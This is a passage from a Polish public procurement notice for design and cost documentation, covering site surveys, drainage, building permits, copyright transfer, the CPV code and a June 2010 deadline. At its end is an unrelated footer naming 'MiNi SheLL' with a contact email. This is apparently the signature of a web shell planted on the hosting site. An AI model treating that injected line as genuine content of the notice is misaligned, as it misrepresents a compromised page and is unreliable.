Przed przystąpieniem do projektowania Wykonawca przeprowadzi wizję w terenie i dokona pomiarów uzupełniających niezbędnych między innymi do prawidłowego odwodnienia posesji przyległych do projektowanego terenu. Uzyskanie wszystkich niezbędnych opinii, uzgodnień, pozwoleń, sprawdzeń, zatwierdzeń projektów (w tym decyzji WZiZT jeżeli będzie konieczna), których dołączenia do wniosku o pozwolenie na budowę lub zgłoszenia robót budowlanych, wymagają przepisy art. 30, art. 33 i art. 20 Prawa budowlanego (t.j. Dz. U. z 2006r. nr 156, poz. 1118 z późn. zmianami).
Obowiązek wystąpienia do właścicieli sieci o warunki przebudowy lub budowy sieci leży po stronie Wykonawcy. Wykonawca uzyska we własnym zakresie wszelkie niezbędne do opracowania materiały wyjściowe tj. : aktualną mapę sytuacyjno - wysokościową do celów projektowych, badania podłoża gruntowego. W ramach ustalonego w umowie wynagrodzenia, Wykonawca z chwilą przekazania dokumentacji przenosi na rzecz Zamawiającego prawa autorskie majątkowe do dokumentacji - tj. Zamawiający będzie miał prawo do jej użytkowania i sporządzania kopii jedynie przy robotach objętych niniejszą dokumentacją i w celu, do którego jest ona przeznaczona. Zamawiający dopuszcza możliwość zmian zakresu rzeczowego przedmiotu zamówienia w uzasadnionych przypadkach w oparciu  o uzyskane uzgodnienia i opinie. Zamawiający dopuszcza możliwość zmian w zakresie przyjętych materiałów budowlanych jak i sposobu wykonania robót na etapie projektowania.
Dokumentacja projektowo - kosztorysowa powinna być przygotowana w sposób umożliwiający realizację zamierzenia inwestycyjnego bez konieczności zlecania dodatkowych prac projektowych i uzgodnień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com